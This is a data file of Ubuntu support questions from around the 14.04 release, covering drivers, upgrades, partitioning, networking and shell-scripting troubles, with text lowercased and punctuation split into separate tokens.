456615	how do i install nvidia drivers in nomodeset ?	under the main question , `` my computer boots to a black screen , what options do i have to fix it ? `` , specifically under `` black/purple screen after you boot ubuntu for the first time '' , the answer recommends that i boot in nomodeset in order to install nvidia drivers since my graphics card has switchable graphic between intel and nvidia . when i boot in , i get a command line , but i am not sure what to do . each attempt to install nvidia drivers have not solved the main problem : when i boot into ubuntu , there is a black screen without the login sound or screen . this has been a problem since i upgraded to 13.10 , and i only managed to update from 13.10 to 14.04 through commands in nomodeset .
456616	have encrypted my disk and need swap space	i have just installed xubuntu 14.04 and elected to do the encryption ( not the full disk , just the ubuntu part and my home dir ) . i realized however that i failed to create any swap space . when i run gparted it shows just two partions sda1 ( /boot ) and the rest of my ssd sda2 . but gparted does not list how much of sda2 is used or unused . why ? i 'm not sure if i can at this point create any swap space , because of the encryption during the installation . what should i do , and how do i do it with gparted . gparted does not seem to let me resize the partitions . my gparted window looks like this : partition file sys mount pt size used unused flags /dev/sda1 ( keys ) ext2 /boot 243mib 53.17mib 189.83mib boot /dev/sda2 extended ( blank ) 476.7gib -- - -- - ( blank ) which partition should i try to change , and how ( to create swap from it ) ? is it not possible to alter a partition without corrupting the encryption ? i have 16gb of ram , and i do use the machine for scientific computing . thank you ! paul
456620	how do i create a ppa for a package made by someone else but not managed anymore	okay , 1st of all , though ive used ppas for all these years , i never went into the details of how they are created and managed and stuff ... so , i am a noob at being on the `` creator '' or `` manager '' side of ppa . now , i have a samsung laptop and there was always a ppa that provided some packages that enabled use of the fn keys for various operations like wireless enable/disable etc etc ... but there are no signs of this ppa being updated anymore for 14.04 ... i downloaded the .deb packages from the launchpad page . so , can i create a new ppa only having the .deb packages ? if yes , how ? if no , can i do get anything else also from the current launchpad page and make a ppa ? a detailed answer would be awesome as ive never created any ppa nor do i know how they are managed ! > _ < the launchpad page for the ppa i am talking about can be found here thankyou !
456624	why this script does n't work in cron and generates a empty output ?	why this script does n't work in the cron for root or other user and generates a empty output ? /tmp/test-1.log -- -- -- -- -- -- -- - # ! /bin/sh /bin/echo this is test-1.sh /bin/date `` + % ft % t '' permissions are ok # ls -l /root/test-* -rwxr-xr-x 1 root root 58 apr 27 22:48 /root/test-1.sh # cron line crontab -e. i had tried these 2 ways , creating and appending 55 * * * * /root/test-1.sh & > /tmp//tmp/test-1.log 58 * * * * /root/test-1.sh & > > /tmp//tmp/test-2.log and output is empty , why ! ! ! ! ! ! # date ; ls -ld /tmp/test* sun apr 27 22:59:56 cest 2014 -rw-r -- r -- 1 root root 0 apr 27 22:55 /tmp/test-1.log -rw-r -- r -- 1 root root 0 apr 27 22:55 /tmp/test-2.log # what 's it wrong ? it must be something simple but i can n't found it . by the way i 'm using ubuntu 12.04.4 lts .
456625	how to install sopcast player in ubuntu 14.04 ?	i have tried to find some ppa 's for ubuntu 14.04 but did n't find any . so i tried to install the package for previous releases , with no luck and a lot of dependencies issues .
456626	ubuntu 12.04 keeps booting to tty1	i was trying to install xdmx & the last thing that i did was deleting the ~/.xauthority* files since i was getting error in locking authority file . on rebooting , i found myself on this screen . i tried startx but i get errors . here 's the output : xauth : error in locking authority file /home/ankesh/.xauthority xauth : error in locking authority file /home/ankesh/.xauthority x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-37-generic x86_64 ubuntu current operating system : linux mindreader 3.11.0-20-generic # 34~precise1-ubuntu smp thu apr 3 17:25:07 utc 2014 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.11.0-20-generic.efi.signed root=uuid=a6d7d9bd-c1c4-4be9-96eb-8a54e6e71354 ro quiet splash vt.handoff=7 build date : 16 october 2013 04:41:23pm xorg-server 2:1.11.4-0ubuntu10.14 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : mon apr 28 01:56:05 2014 ( == ) using config file : `` /etc/x11/xorg.conf '' ( == ) using config directory : `` /etc/x11/xorg.conf.d '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' fatal server error : no screens found please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : no such file or directory xinit : server error xauth : error in locking authority file /home/ankesh/.xauthority i also tried reinstalling xorg but that did n't help either . echo $ display gives nothing . i 'd really appreciate any help i can get with this . thanks .
456627	show the shortcuts cheatsheets	i 've just installed trusty with unity . i press the win key for a while , but the shortcuts cheatsheet wo n't show up . i tried with compiz-settings-manager and with ubuntu-tweaks with no luck at all . is there some way to see them ? whay has it changed the way it behaved ?
456629	how to install windows alongside ubuntu ?	i have a computer which is currently running ubuntu 14.04 . i would like to dual boot with windows 8 . i can not find any instructions for installing windows after ubuntu is already installed . i am only finding instructions for doing the opposite , installing ubuntu after windows 8 .
456630	where can i find a unified explanation of lower-level filesystem structure in ubuntu ?	this is not a duplicate question about file-system hierarchy that can be answered by pointing me toward man hier , ubuntu-policy , or something . i 've looked at those questions . my problem is that i need a deeper look at the directory structure . it turns out that the answers to many questions are in the purpose of lower level directories like /usr/share/applications or /var/run/sendsigs.omit.d , which do not seem to be covered by the standard documentation that is referred to in the questions i 've found . i 'm sure documentation exists concerning all these directories , but since they are standard to ubuntu , it would be nice if a hierarchy document covered all their various purposes , perhaps even with links back to the documents to their related services/applications . the reason why i want this is because it cuts down on time and confusion spent looking through google etc . when i encounter a problem if i already know where directories associated with some problem reside .
456631	light locker is n't saving my changed settings	i installed xubuntu 14.04 on my asus n10j computer , and light locker and it is n't saving my settings changes to it . i have tried restarting my computer , logging out ... it does n't work . i want to change my settings to not have my system to not shutdown unless i do it manually or the power on the battery get to 10 percent .
456633	changing the x11 default pointer size	the mechanism for changing the cursor theme has been outlined in answers to other questions such as this one . moreover , this question contains the procedure that i use . in case you do n't want to follow the link it works something like this : 1 ) run sudo update-alternatives -- config x-cursor-theme this changes the `` default '' pointer . 2 ) launch dconf-editor and change org.gnome.desktop.interface.cursor-theme to the theme you want . even more condensed we have : 1 ) set the x11 pointer 2 ) set the gtk/gnome/unity pointer so here 's the rub : using these methods , i can set the size for gtk/gnome , but the update-alternatives method just allows for changing the theme , not the size . the feeling i get from reading various forums seems to be `` just install a different cursor theme which has the size you want as a default . '' is this actually the current state of affairs ? p.s . in case it matters , i 'm using the dmz-cursor-theme which claims that the cursors are in a `` scalable format . ''
456634	update-manager stuck while installing package to upgrade from 13.10 to 14.04	update-manager appears to be stuck . last package installed appears to be an apache module , but i did n't realize i had installed apache ( possible a prerequisite for another package installed ? ) . i left it for about an hour hoping that it would progress but the bar never moved and last installed package has n't changed . it was sitting at about 75 % complete in the entire upgrade/package install process before i had to head out ( wo n't be home for a few hours , but this has been bothering me all day ) . has anyone experienced this ? is there a way to recover ? a way to stop the current process and force it to continue ? my fear is that if i force a reboot , that it wo n't boot properly or there will be much in the way of broken packages .
456643	after upgrading to ubuntu 14.04 from ubuntu 13.10 , my graphics card quit working .	since i upgraded from 13.10 to 14.04 the browser scrolling has been laggy and is n't smooth . the graphics card is n't supported by ati , and i do n't know what driver i was using in ubuntu 13.10 . here are some information about my graphics card : description : vga compatible controller product : rs480 radeon xpress 200 series vendor : advanced micro devices , inc. amd/ati
456644	wireless does n't reconnect after resuming on after the upgrade to ubuntu 14.04 on my macbook pro .	i have a macbook pro with it dual-booting with ubuntu 14.04 and mac os x , and a few days ago i upgraded ubuntu from 13.10 to 14.04 . when i suspend and then resume the system , wireless tries to connect but fails , and i tried some solutions like restart the network or remove and reload the wifi kernel module ( b43 ) , but nothing worked . only a restart of the system solve the issue . the output of dmesg indicates an authentication problem : ... [ 8050.906223 ] wlan0 : deauthenticating from < mac_address > by local choice ( reason=3 ) [ 8050.914824 ] wlan0 : authenticate with < mac_address > [ 8050.915142 ] wlan0 : send auth to < mac_address > ( try 1/3 ) [ 8050.917960 ] wlan0 : authenticated [ 8055.919691 ] wlan0 : deauthenticating from < mac_address > by local choice ( reason=3 ) [ 8066.438256 ] wlan0 : authenticate with < mac_address > [ 8066.438631 ] wlan0 : send auth to < mac_address > ( try 1/3 ) [ 8066.440185 ] wlan0 : authenticated [ 8071.447980 ] wlan0 : deauthenticating from < mac_address > by local choice ( reason=3 ) [ 8082.466500 ] wlan0 : authenticate with < mac_address > [ 8082.473305 ] wlan0 : send auth to < mac_address > ( try 1/3 ) [ 8082.493654 ] wlan0 : authenticated ...
456647	ubuntu & virtual box - follow up question	have downloaded ubuntu server 14.04 , 64-bit . have also downloaded virtual box 4.3.10 ( which supports 64 bits ) . my operating system is windows 7 - 64 bit . when i configure virtual box for ubuntu , and name the new file `` linux ubuntu , '' the system type changes to `` linux '' and the version changes to `` ubuntu 32 . '' there is n't an option for `` ubuntu 64 , '' which seems to cause a problem later when i try to run ubuntu within the virtual box . what is happening ? i 'm on a 64-bit system , i 've downloaded a version of ubuntu that 's for 64-bits only , my version of virtual box is the newest , and allows for 64-bit systems . why am i not seeing an option for `` ubuntu 64-bit '' when i try to create an ubuntu file within virtual box ? how do i fix this problem ?
456648	opening live usb from grub prompt	while trying to upgrade to 14.04 , in a series of unwise moves i ended up destroying my ubuntu installation . so i used a live usb to mount my original disk drive and recover my files , before reinstalling everything . so far , ok . the problem is that when i restarted my pc ( possibly because i forgot to unmount the disk ? ) , i was directed to the grub prompt , and i do n't know how to open the live usb or the boot-repair at the prompt . i do n't know if it is helpful , but 'ls ' returns : ( hd0 ) ( hd1 , msdos1 ) ( hd1 ) ( hd1 , gpt3 ) ( hd1 , gpt2 ) ( hd1 , gpt1 ) ( cd0 ) error : failure reading sector 0x0 from 'cd0 ' .
456649	hp laserjet p1005 printer quit working when i upgraded to ubuntu 14.04 from 12.04	my hp laserjet p1005 printer was working in ubuntu 12.04 , but when i upgraded to ubuntu 14.04 it stopped working . the hplip is working , and also my printer is appearing in the printers list . also when i send a job , the computer sometimes shows that the job is successfully printed , ( and sometimes the computer adds the job to the list of the jobs that are waiting to be printed ) , but nothing happens , it just doesnât print anymore . why ?
456652	video resolution radeon express 200	i use ubuntu 13.10 and radeon xpress 20 . my resolution stuck on 1024 * 768 . is ubuntu only support this resolution for this graphic card or i need install or configure the card make resolution is higher ? your help and information is great appreciated , inung
456654	determining disk usage statistics and tailoring partition sizes accordingly	i have three separate partitions whose orders i do not remember in my ubuntu 12.04.3 lts installation . however , the output of `` df '' yields two physical devices when the data partion , windows partition and recovery partition are not mounted . here is the output : filesystem 1k-blocks used available use % mounted on /dev/sda6 27997208 22544928 4030152 85 % / udev 1999156 4 1999152 1 % /dev tmpfs 401312 920 400392 1 % /run none 5120 0 5120 0 % /run/lock none 2006560 1284 2005276 1 % /run/shm /dev/sda8 20642428 17470272 2123584 90 % /home i also wonder if there is a tool that gives information about a partition that is not already mounted . furthermore , i would like to resize my partitions since i need more space in ubuntu but i am afraid that this will be a risky task . moreover , can disks be mounted at system startup without the user interfering ? thanks
456656	how can i access openvpn to a vpn provider	how can i open with a connection to a vpn vpn provider build . i have the netherlands_b.ovpn file and ca.crt . what is the command ? openvpn - config netherlands_b.ovpn
456660	disable discrete gpu	my discrete gpu continues to power on at startup after upgrading to 14.04 . i have tried the option below and it does not work . # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . echo off > /sys/kernel/debug/vgaswitcheroo/switch exit 0
456663	how do i reset or recover my root password ?	i have forgotten my root password after changing it . is there a way to recover or reset it . i really do not want to reinstall ubuntu again .
456664	upgraded to 14.04 now the system is constantly freezing	each 5 seconds the system freezes for a second , i ca n't move the mouse , the audio repeats the last second , i have no idea of what is causing it , but i have an laptop with nvidia optimus and i 'm using bumblebee . here is my /var/log/dmesg .
456669	nautilus connect to server via ssh no longer present in ubuntu 14.04	i just upgrade to ubuntu 14.04 and i see that the connect to another server via ssh is no longer part of the nautilus environment . can anyone direct me how to re-enable this feature . thanks , wayne
456670	is there a way to add the status bar to files ubuntu 14.04	i upgraded to ubuntu 14.04 and the file manager changed it 's files instead of nautilus , but now there 's no status bar where i can view the amount of diskspace . i have a 120 gb ssd so i would very much like to see my diskspace usage at all times . is there any way to get the status bar back or are there alternative file managers which support the feature ?
456672	how well does ubuntu handle real time audio ?	i want to ditch windows for one of my pc 's because windows ca n't handle my music without stuttering due to latencies . how well can ubuntu handle real time audio ? i need low latency .
456675	problem while trying to create users in ubuntu 14.04 64bits version	my problem began when i tried to create a new user in gui mode . when i click on `` users accounts '' in `` system configuration '' the window changes to black and stops responding . i tried to reinstall the os but the problem continues . i have ubuntu 14.04 ( 64-bit version ) .
456678	edit connection in network manager puzzling me	i 'm slightly puzzled with the information listed in my edit connections of network manager . i 'm the only one who uses my laptop and i 've only connected to one network via wireless . however in the edit connections , it shows the laptop has been connected to three networks- one via wired and the other two connections via wireless ( includes the password ) . i know one of the wireless network connections but not the other two connections . other than the possibility of another person physically using my computer or me 'sleep-computing ' , ** is anyone able to help me resolve this puzzlement ? thanks in advance . update : **how else could the edit connection in network manager show that my computer has been connected to two other networks ?
456688	what causes packages to appear broken	there are many answer related to fixing either specific broken packages or fixing most/all packages in a general way . this question is related to why and what cause packages to appear broken or get broken during the package handling ( downloading , setting up , installing ... ) . what are the reasons packages break in ubuntu and what can be done to lessen the chances of broken packages appearing in ubuntu .
456689	`` error : xdg_runtime_dir not set in the environment . '' when attempting to run nautilus as root	i am attempting to run nautilus as root but when i run `` sudo nautilus '' from the terminal , i get the following error : error : xdg_runtime_dir not set in the environment . ( nautilus:9341 ) : gtk-warning ** : can not open display : the issue does not occur when i attempt to run nautilus as non-root . i am using ubuntu 14.04 . does anyone know how i can fix this ?
456695	shell - cut : you must specify a list of bytes , characters , or fields	i am trying to get the output of the command line arguments in reverse order . but i am getting a error while doing so . this is the code : # ! /bin/bash str= $ @ len= $ # space= '' `` echo `` no . of arguments = $ len '' echo `` entered arguments = $ str '' while [ $ len -ne 0 ] do tmp=`echo $ str | cut -d `` `` f $ len` rev= $ rev $ tmp $ space len=`expr $ len - 1` done echo `` arguments in reverse = $ rev '' and when i run the script , i get this error : robin @ robin-virtualbox : ~/lx $ ./s1.sh one two three no . of arguments = 3 entered arguments = one two three cut : you must specify a list of bytes , characters , or fields try 'cut -- help ' for more information . cut : you must specify a list of bytes , characters , or fields try 'cut -- help ' for more information . cut : you must specify a list of bytes , characters , or fields try 'cut -- help ' for more information . arguments in reverse =
456696	remove multiple players from ubuntu sound menu is not working on 14.04	the fallowing procedure is not working : http : //www.omgubuntu.co.uk/2012/07/how-to-remove-multiple-players-from-ubuntu-sound-menu i have tried to put vlc there with no success . any help ?
456697	cairo dock context menu	instead of showing the full context menu for applications , cairo dock shows items in a context menu 1/2 of the size with scrolling arrows . how can i fix this and make cairo dock show the context menu in full , like for the application launcher :
456708	default gateway and upgrade to 3.2.0-61-generic	i upgraded one of my ubuntu servers at work this weekend to kernel 3.2.0-61-generic through a remote connection from home . after reboot , i was unable to ssh back into the machine from my home computer . i proceeded to ssh into another server , and was able to successfully ssh into the original computer . i was able to use any of the available services as long as i was on a machine on the same subnet , but unable to access any services from a machine outside the building . not having physical access to the server , how can i downgrade to the previous kernerl , 3.2.0-60-generic . or , if anyone else has had this issue , and has a solution , that would be great , as well .
456709	i 'm not sure where to find my flash drive	when i plugged in my brand new flash drive , it did n't pop up or show up in the computer tap in files . how do i find the flash drive so i can access it and its files . is there something i have to do in the terminal , or is it a simple setting change . please help . thanks ! !
456714	screen freezes ubuntu 14.04 lts	i have a gt 520mx and updated with the nvidia proprietary driver ( tested ) , each time the screen freezes , you can touch the keys but can not see anything . each 5 seconds the system freezes . any solution ?
456716	i get an error 19 , failed to resume with device 0:007	i 've searched the web for answers to this , and the only other question that looks exactly like mine concerned ubuntu 13.10 ( 8 months ago ) , with no answer to date . i 'm on 14.04 . i experience no system problem after resume , but i do see the error 19 flash on the black screen just before waking . it points to device 0:007 as the problem . any suggestions ? what 's the problem with it ?
456717	thunderbird stuck at `` checking password ... ''	i hope it 's not improper to post a question about thunderbird on here , but i did n't find their site too helpful . the other day my thunderbird stopped syncing with my email . i 've tried everything i know to do ( including re-installing ubuntu ) and i 'm still getting a problem . specifically , when i go to setup an account , i get to the last step and click `` done , '' but the account is never created because it is stuck on `` checking password ... '' when i first setup ubuntu 14.04 , it worked flawlessly , but now even after a re-install , thunderbird is giving me this problem . plus , all of the information i have input into thunderbird is correct .
456718	unity launcher , dash and menu fonts are not anti-aliased	i am running ubuntu 14.04 . after installing qt4 settings manager and tinkering with it ( changing the font face for qt apps ) i notice that unity launcher , dash and menu and date indicator fonts are not anti-aliased anymore . i have no idea why that happened . any ideas why ? see the screenshots below : http : //goo.gl/f1egmp http : //goo.gl/nykqpw
456721	what does this `` 1 '' mean over the chromium button in the launcher ?	i took a screenshot but i ca n't work out how to attach it . i think the words in the question itself do the trick . at least , i hope they do .
456725	struggling with apache	good evening all , i am a new linux user , and i have a ubuntu server in a rack at my house . i am attempting to install multicraft on it , i followed the instructions of this video https : //www.youtube.com/watch ? v=758vk7wfqug . basically it instructed me to create a lamp server . i did as follows . i confirmed that apache is functioning correctly by going to the lan address of the server , and i was able to access phpmyadmin by typing 192.168.1.8/phpmyadmin . here is where it gets sticky . when i type 192.168.1.8/multicraft to access the control panel to finalize the installation i get this : not found the requested url /multicraft was not found on this server . apache/2.4.7 ( ubuntu ) server at 192.168.1.8 port 80 everything ive seen from the tutorials and such says this should be working but for some reason its not . does anyone have any ideas ? thanks in advance , papabear
456728	huge wallch icon in xubuntu 14.04 ( xfce-panel )	i have strange problem . my wallch icon is huge . see the screenshot : i removed xfce settings and reordered items a little . how can i restore normal wallch icon size ? update : my /usr/share/applications/wallch-nautilus.desktop file : [ desktop entry ] version=4 name=wallch comment=change desktop wallpapers automatically exec=/usr/bin/wallch % u icon=wallch terminal=false type=application categories=utility ; application ; mimetype=inode/directory ; actions=change_wallpaper ; start ; [ desktop action change_wallpaper ] name=change wallpaper once exec=/usr/bin/wallch -- change targetenvironmet=unity [ desktop action start ] name=start/stop wallpapers exec=/usr/bin/wallch -- start targetenvironment=unity and the /usr/share/pixmaps/wallch.png :
456729	accessing an ssh server after disabling ssh password authentication for root	when updating a server from 12.04 to 14.04 , a wrong press of enter lead me to disable ssh password authentication for root ( one of the options it mentions while updating through ssh ) . the whole update procedure finished correctly but after rebooting the cloud node it shows the prompt for password in the terminal but the password is always wrong : permission denied , please try again . how can i restore ssh connection to the server if the only way to access it was through ssh . is there anything i can do client side to connect to the server via ssh again ?
456733	adobe flash player issue in chromium in ubuntu	playing youtube videos in chromium i got the following issue flash play is already installed on the system . how do i fix it ?
456735	is there any desktop lock available	is the any software available to just prevent the desktop from accessing ( ie i want to lock the desktop , but want to downloads to continue ) previously i was using clearlock on windows
456736	how to i get my page on ubuntu 14.04 to maximize correctly	when i click maximize , it will maximize the window . however it will leave about a one inch gap between the top and the left side . how do i get this to go away and make the window maximize fully . the left side is where i have the launcher bar located . thank you .
456737	gnome-shell broken by menulibre	i used menulibre to create an application launcher and , after editing and saving it a few times , gnome-shell ( 3.10 ) instantly crashed . it will not restart ; rebooting and logging in again simply results in a blank screen . strangely , this is nothing to do with the ( not ) offending .desktop file , as deleting it with the virtual terminal does not solve the problem . i 've also tried removing the gnome-shell folder in .local and the session cache folder in ~/.cache . this problem has happened before in exactly the same situation ( using menulibre and gnome-shell ) , so there is no uncertainty as to menulibre being the cause . i have no idea how to access gnome 's error log , so i 'm asking for help with identifying the problem and restoring a usable session .
456739	ca n't get mouse back in gedit after shift key is pressed	by default when you type in gedit , mouse disappears and you can get it back by moving your mouse . so , you can do whatever you want using your mouse . but when i press shift or ctrl or enter and move the mouse to get the it back on screen , it wo n't work . the mouse will be shown when it 's moved and suddenly disappears . so , i ca n't do any actions using it . this is a very weird bug . to get back the mouse , i have to right click on the editor . is this a known bug ? how can i fix it ? has only gedit ( version 3.10.4 ) this bug ? should i downgrade it to lower version ? i 've tested this on leafpad text editor and this problem does n't exist there . 2nd bug when you 're typing for a while ( like 30 minutes or more ) , sometimes gedit wo n't allow typing anymore , but you can save the file and do other stuff . there wo n't be any cursor to make it normal again , you have to close the gedit window and start new one . as far as i tested , this `` new gedit '' is way too buggy . is there any other lightweight ( or not ) text editors like gedit with code markup and other stuff ? update when gedit is ran in root ( gksudo gedit ) , this bug does n't seem to exist . so , why does this bug occur in normal user and not in root ?
456740	keep gnome 3.8 in ubuntu 14.04	is there any way to retain gnome shell 3.8 after the update to trusty ? gnome shell 3.10 breaks my theme and half my extensions ( i use almost a dozen ) , plus i really donât like the new `` integrated '' status area and header bars . help is much appreciated .
456742	unable to install enlightenment libraries ( e17 ) on precise	i have tried all the solutions i could find on the forum . after adding the ppa links to the system 's software resources and then issuing the apt-get update command results in following error . w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 1b0a17e5c4f5c2f1 going about it the other way , issuing apt-add-repository ppa : efl/trunk command , i get the following error . traceback ( most recent call last ) : file `` /usr/bin/apt-add-repository '' , line 128 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 84 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 56 , 'received http code 403 from proxy after connect ' ) please suggest what should i do .
456743	`` root file system not defined . please correct this from partitioning menu '' ubuntu 14.04 installation problem in pre-installed win 8 laptop	i am not exactly new to linux , but i am facing problems trying to install ubuntu 14.04 lts on my dell inspiron 14z pre-installed windows 8 with secure boot nand uefi mode . **i have followed all the prescribed steps of your post regarding ubuntu installation one of this forum 's post installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) ** . i am able to boot to liveusb mode via uefi mode . but when going through the installation process , partitions do n't appear at all on the 4th slide of the install process . so i just press `` install '' just to see what happens . there is a pop-up window which says `` no root file system defined . please correct this from the partitioning menu . '' i have created three partitions on windows 8 of which one is entirely free ( 100 gb ) and formatted and ready to be installed on . please help me resolve this issue . thanks and cheers
456744	text gets displayed during boot after nvidia installtion	after installing latest nvidia drivers from xorg edgers ppa , the boot screen ( where it shows ubuntu logo ) displays background process as text . is there any way to restore the default boot screen using nvidia driver . ( note : it changes back to default logo and resolution once i change back to nouveau driver )
456749	google earth not install on 14.04	i 'm trying to install google earth on ubuntu 14.04 and get the following error . the problem show up using dpkg -i to install the .deb downloades from google site , beside i tested with ubuntu software center too . exists similar questions in this site talking about installation problems , but none of them are on 14.04 , so i decided post a new questions seeking for tips-solutions for the current lts ubuntu version ( most comments and suggestion in those previous questions are targeted oldest ubuntu versions ) preparing to unpack google-earth-stable_current_amd64.deb ... unpacking google-earth-stable ( 7.1.2.2041-r0 ) ... dpkg : dependency problems prevent configuration of google-earth-stable : google-earth-stable depends on lsb-core ( > = 3.2 ) ; however : package lsb-core is not installed . google-earth-stable depends on ia32-libs ; however : package ia32-libs is not installed . dpkg : error processing package google-earth-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... errors were encountered while processing : google-earth-stable doing what is described here i got : sudo dpkg -i google-earth-stable_current_amd64.deb selecting previously unselected package google-earth-stable . ( reading database ... 277661 files and directories currently installed . ) preparing to unpack google-earth-stable_current_amd64.deb ... unpacking google-earth-stable ( 7.1.2.2041-r0 ) ... dpkg : dependency problems prevent configuration of google-earth-stable : google-earth-stable depends on lsb-core ( > = 3.2 ) ; however : package lsb-core is not installed . google-earth-stable depends on ia32-libs ; however : package ia32-libs is not installed . dpkg : error processing package google-earth-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... errors were encountered while processing : google-earth-stable
456750	failed web upgrade of ubuntu from 13.10 to 14.04 , what now ?	tried to upgrade via a ubuntu upgrade download from 13.10 to 14.04 and all seemed well . all the files downloaded , but the machine hung on one of the printer packages - i waited one hour - forcing a reboot . now i have a desktop which is pretty well organized as before , but no mouse no internet access and no network . ubuntu boots with a heap of errors and will also not shut down . what is the procedure to either undo the install and return me to my previous version , or to get the screwed install to correct itself ? it would be a pity if i lost all my work such as installed programs , links etc . i am a beginner and would not have the foggiest where to start . i have downloaded the ubuntu 14.04 iso and burned the dvd .
456752	how to recover ubuntu14.04 and windows7 partition	i used easeus partition master to make a new partition under windows7 for games . i made the new partition succesfully , but my computer ca n't find any bootable partition ( grub rescue ) . ubuntu 's installer and gparted ca n't see the partitions , however disk utility see ( under live cd ) all the partitions and i can access them . how can i recover them with ( out ) data loss ?
456753	find particular index from the command line output	following is the command that find the total sinks of pulseaudio : pactl list short sinks output : 0 alsa_output.pci-0000_00_1b.0.hdmi-stereo module-alsa-card.c s16le 2ch 44100hz running 1 alsa_output.usb-0d8c_c-media_usb_audio_device-00-device.analog-stereo module-alsa-card.c s16le 2ch 44100hz running 3 bluez_sink.94_ce_2c_fa_8b_b1 module-bluetooth-device.c s16le 1ch 8000hz idle so i use the following command to find the specific sinks : pactl list short sinks | grep `` c-media_usb_audio_device '' output : 1 alsa_output.usb-0d8c_c-media_usb_audio_device-00-device.analog-stereo module-alsa-card.c s16le 2ch 44100hz running this print the specific sink name with index . i want store this index 1 in the variable so i can use it in my another logic .
456754	problems with gtk themes	a few weeks ago , i installed razor-qt on 14.04. everything was okay , but whenever i open a gtk application , it defaults to the elementary theme , as i had the pantheon de installed on it before . the window border is the gtk theme i want , as i use metacity , but even when i try to set the gtk theme in ubuntu tweak , it doesnt work , even as root . also i have installed the azenis icon theme , and it is okay in qt programs , but it defaults to elementary theme in gtk ones . my gtk and qt theme is delorean dark . any help is appreciated .
456756	can not upgrade to ubuntu 14.04 from 12.10	currently , i am using ubuntu 12.10 . when i open software updates , i find new release ubuntu 13.04 rather than ubuntu 14.04 . please help !
456759	asus usb-n13 wireless adapter problems with ubuntu 14.04	i am running ubuntu 14.04 and i am sort of new to the linux world and networking , i am having trouble with with my asus n-13 network adapter , i get a signal but that signal drops often and it becomes very frustrating , any sort of advice on what i can do would be greatly appreciated . : )
456766	how to set default session in ubuntu 14.04 lts ?	i have tried one of our site solution but its not working . the solution in our site is how do i change the default session for when using auto-logins ? but its not working for ubuntu 14.04 lts . how to change session but not from login screen ?
456773	i 'm running ubuntu 12.4 how do i move a window from the top right corner	so i am running ubuntu 12.4 and sometimes when i click on an icon it puts the window in the top right/left hand corner and i ca n't figure out how to move it so i can close out of it or move it or put it in full screen . how do i fix this ? thanks : d
456776	how do i pass complicated shell commands over ssh to be executed remotely ? mine throw syntax errors or get interpreted locally !	i have a command like this which tells me if a system has a disk that 's getting full ( > =70 % full ) : if [ [ -n df -pth|column -t|awk ' { print $ 6 $ 7 } '|awk -f '' % '' ' { printf `` % -9s % -5s\n '' , $ 1 , $ 2 } '|grep -v -e `` use '' -e `` mounted '' |awk ' $ 1 > 70 { printf `` % -9s % -5s\n '' , $ 1 , $ 2 } ' ] ] ; then echo `` not present '' ; else echo `` > 70 is present '' ; fi i 'd like to want to perform the above command on a remote server using using ssh . something like : ssh remoteserver `` if [ [ -n df -pth|column -t|awk ' { print $ 6 $ 7 } '|awk -f '' % '' ' { printf `` % -9s % -5s\n '' , $ 1 , $ 2 } '|grep -v -e `` use '' -e `` mounted '' |awk ' $ 1 > 70 { printf `` % -9s % -5s\n '' , $ 1 , $ 2 } ' ] ] ; then echo `` not present '' ; else echo `` > 70 is present '' ; fi '' but when i tried that , i got the following error : host : remoteserver bash : -c : line 0 : syntax error in conditional expression bash : -c : line 0 : syntax error near /home' bash : -c : line 0 : if [ [ -n 92 /home'
456791	can not upgrade to ubuntu 14.04	when i try to upgrade from ubuntu gnome 13.10 to ubuntu 14.04 , the upgrade application fails with the following message : could not calculate the upgrade . an unresolvable problem occurred while calculating the upgrade.` here is the complete log : $ cat /etc/issue ubuntu 13.10 \n \l $ sudo apt-get update $ sudo apt-get upgrade $ sudo do-release-upgrade checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done am i missing something ? or it is just a bug ? update : i analyzed the log file and found that do-release-upgrade is complaining about some obsolete packages . $ cat /var/log/dist-upgrade/main.log | grep obsolete 2014-04-28 09:16:23,678 debug obsolete : flashplugin-nonfree-extrasound : i386 ( .. ) after removing those packages , i was able to proceed with the upgrade .
